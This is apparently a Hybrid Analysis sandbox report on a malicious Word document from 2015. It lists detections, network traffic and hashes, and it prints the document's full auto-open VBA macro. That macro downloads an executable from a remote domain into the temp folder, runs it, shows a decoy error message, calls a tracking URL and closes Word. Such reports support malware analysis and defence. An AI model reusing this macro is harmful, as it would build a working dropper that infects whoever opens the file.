5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
This report is generated from a file or URL submitted to this webservice on December 10th 2015 07:21:50 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v3.00 © Hybrid Analysis
Attention: this analysis ran with the legacy Usermode Monitor. It is highly recommended to use the Kernelmode Monitor.
Incident Response
Risk Assessment
- Remote Access
- Contains a remote desktop related string
- Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 8
-
Exploit/Shellcode
-
Found URL in decoded VBA string
- details
-
Pattern match: "http://germanya.com.ec/logs/test.exe"
Pattern match: "http://germanya.com.ec/logs/counter.php" - source
- File/Memory
- relevance
- 10/10
-
Found URL in decoded VBA string
-
External Systems
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 33/55 Antivirus vendors marked sample as malicious (60% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 33/55 Antivirus vendors marked sample as malicious (60% detection rate)
- source
- External System
- relevance
- 8/10
-
Sample was identified as malicious by a large number of Antivirus engines
-
General
-
GETs files from a webserver
- details
-
"GET /logs/test.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: germanya.com.ec
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
GETs files from a webserver
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "192.185.72.225" (ASN: 20013, Owner: CyrusOne LLC): ...
URL: http://germanya.com.ec/logs/counter.php" (AV positives: 2/63 scanned on 07/13/2015 21:43:07)
URL: http://germanya.com.ec/ (AV positives: 1/63 scanned on 05/06/2015 14:53:46)
URL: http://germanya.com.ec/logs/counter.php (AV positives: 4/52 scanned on 05/22/2014 09:32:35)
URL: http://germanya.com.ec/logs/test.exe (AV positives: 10/51 scanned on 05/19/2014 10:39:20)
URL: http://constructorachegados.com/lpc (AV positives: 2/51 scanned on 05/02/2014 01:06:31)
File SHA256: 1e9ff24f8df1eaae94c73aa802b0bfb7ef229fee3a8043defe4cff0ba7032297 (AV positives: 36/53 scanned on 05/19/2014 10:39:23) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
-
Found keyword "Auto_Open" which indicates: "Runs when the Excel Workbook is opened"
Found keyword "Workbook_Open" which indicates: "Runs when the Excel Workbook is opened"
Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
-
Found keyword "Auto_Open" which indicates: "Runs when the Excel Workbook is opened"
Found keyword "Workbook_Open" which indicates: "Runs when the Excel Workbook is opened"
Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened" - source
- File/Memory
- relevance
- 10/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 7
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://germanya.com.ec/logs/test.exe"
Pattern match: "http://germanya.com.ec/logs/counter.php"
Pattern match: "http://ns.adobe.com/xap/1.0/"
Pattern match: "E.yo/#Tcb0jVxbKTbvnqZ4uF1mDmm-k9c^E7~'dZi"
Pattern match: "fE.qVy/VN#7WA"
Pattern match: "stu9lIL.tS/\3!#ep2,$FG_LXn7F"
Heuristic match: "fckOPaK.TG"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "www.despachospublicos.com/sites/default/files/Dian%20.jpg?1345649341"
Pattern match: "genya.com.ec/logs/test.exe"
Pattern match: "http://germanya.com.ec/logs/test.exeTMP$2\sfjozjero.exeA@0'http://germanya.com.ec/logs/counter.phpTMP$2"
Pattern match: "linksur.cl/tienda/css/tert.exeTMP\sfjozjeri.exeVBE6.DLL"
Pattern match: "http://bit.ly/1gudjPa\lkjljlljk"
Pattern match: "germanya.com.ec/logs/test.exe\sfjozjero.exeNhttp://germanya.com.ec/logs/counter.phppFrU~"
Pattern match: "http://gmpg.org/xfn/11"
Pattern match: "http://code.jquery.com/jquery-1.9.1.js"
Pattern match: "http://ip/~username/"
Pattern match: "http://example.com/example/Example/help.html"
Pattern match: "addondomain.com/example/Example/" - source
- File/Memory
- relevance
- 2/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Remote Access Related
-
Contains a remote desktop related string
- details
-
"la,k ,Sin lista<U<Hipervnculo>*B*phZBZTexto independienteCJOJQJ^JmH" (Indicator for product: Generic VNC)
"4NVANHipervnculo visitado>*B*phdQRdTexto independiente 3$a$CJOJQJ^JmH" (Indicator for product: Generic VNC) - source
- File/Memory
- relevance
- 10/10
-
Contains a remote desktop related string
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Environ" which indicates: "May read system environment variables"
Found suspicious keyword "URLDownloadToFileA" which indicates: "May download files from the Internet" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "Environ" which indicates: "May read system environment variables"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
Found suspicious keyword "URLDownloadToFileA" which indicates: "May download files from the Internet" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "E923194EF1" to virtual address "0x77353D01" ("SetUnhandledExceptionFilter@kernel32.dll")
"WINWORD.EXE" wrote bytes "055324E6" to virtual address "0x2FF71634" (part of module "WINWORD.EXE") - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 6
-
General
-
Contacts domains
- details
- "germanya.com.ec"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "192.185.72.225:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Option Explicit
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _
ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
ByVal HQTLDG As Long) As Long
Sub AutoOpen()
Auto_Open
End Sub
Sub Auto_Open()
SNVJYQ
End Sub
Public Sub SNVJYQ()
OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe"
End Sub
Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
Dim HRKUYU, lala As Long
HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
If HRKUYU = 0 Then OGEXYR = True
Dim YKPZZS
YKPZZS = Shell(PHHWIV, 1)
MsgBox "El contenido de este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0)
Application.DisplayAlerts = False
Application.Quit
End Function
Sub Workbook_Open()
Auto_Open
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates mutants
- details
-
"IESQMMUTEX_0_208"
"KYIMEShareCachedData.MutexObject.PSPUBWS"
"KYTransactionServer.MutexObject.PSPUBWS"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\c:!users!pspubws!appdata!roaming!microsoft!windows!ietldcache!"
"Local\WininetStartupMutex"
"Local\WininetConnectionMutex"
"Local\WininetProxyRegistryMutex"
"Local\ZonesCounterMutex"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\ZonesLockedCacheCounterMutex" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\office12\riched20.dll" at 672E0000
- source
- Loaded Module
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
- "carved_0.exe" has type "HTML document, ASCII text, with very long lines"
- source
- Binary File
- relevance
- 3/10
-
Dropped files
File Details
5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
- Filename
- 5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
- Size
- 520KiB (531968 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Gu, Author: OFEyDV, Template: Normal.dotm, Last Saved By: clein, Revision Number: 13, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:20:00, Last Printed: Wed Jun 7 15:04:00 2006, Create Time/Date: Mon Mar 30 15:18:00 2009, Last Saved Time/Date: Wed May 14 13:45:00 2014, Number of Pages: 7, Number of Words: 269, Number of Characters: 1485, Security: 0
- Architecture
- WINDOWS
- SHA256
- 5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
- MD5
- 4aa84fb242abbba1a9dd2b8976cab2ce
- SHA1
- 5055803a59b82b1c33c6a78150b07a080f0bcadd
Classification (TrID)
- 35.9% (.DOC) Microsoft Word document
- 33.7% (.XLS) Microsoft Excel sheet
- 21.3% (.DOC) Microsoft Word document (old ver.)
- 8.9% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total (System Resource Monitor).
- WINWORD.EXE /n /dde (PID: 2952)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
germanya.com.ec | 192.185.72.225 | - | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
192.185.72.225 |
80
TCP |
- |
United States
ASN: 20013 (CyrusOne LLC) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
192.185.72.225:80 (germanya.com.ec) | GET | germanya.com.ec/logs/test.exe |
Extracted Strings
Extracted Files
-
Informative 1
-
-
carved_0.exe
- Size
- 12KiB (11812 bytes)
- Type
- HTML document, ASCII text, with very long lines
- Context
- germanya.com.ec
- MD5
- e58a860d8e41196fe5a0d71131d5f341
- SHA1
- eb3088e3a139889d331af84dcf3e06fba2613c63
- SHA256
- b98e58f0f2c62969d61ce2ec31043dacb8d378ecbbfcae138b6250d432e195dd
-
Notifications
Community
Anonymous commented 4 years ago updated
Anonymous commented 4 years ago updated
Anonymous commented 4 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 3 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 2 years ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 1 year ago updated
Anonymous commented 11 months ago updated
Anonymous commented 11 months ago updated
Anonymous commented 11 months ago updated
Anonymous commented 11 months ago updated
Anonymous commented 11 months ago updated
Anonymous commented 11 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 10 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 9 months ago updated
Anonymous commented 8 months ago updated
Anonymous commented 8 months ago updated
Anonymous commented 8 months ago updated
Anonymous commented 6 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 5 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 4 months ago updated
Anonymous commented 3 months ago updated
Anonymous commented 1 month ago updated
Anonymous commented 1 month ago updated
Anonymous commented 28 days ago updated
Anonymous commented 28 days ago updated
Anonymous commented 27 days ago updated
Anonymous commented 27 days ago updated
Anonymous commented 26 days ago updated
Anonymous commented 26 days ago updated
Anonymous commented 26 days ago updated
Anonymous commented 26 days ago updated
Anonymous commented 25 days ago updated
Anonymous commented 25 days ago updated
Anonymous commented 25 days ago updated
Anonymous commented 25 days ago updated
Anonymous commented 25 days ago updated
Anonymous commented 24 days ago updated
Anonymous commented 24 days ago updated
Anonymous commented 22 days ago updated
Anonymous commented 22 days ago updated
Anonymous commented 22 days ago updated
Anonymous commented 21 days ago updated
Anonymous commented 18 days ago updated
Anonymous commented 6 days ago updated
Anonymous commented 6 days ago updated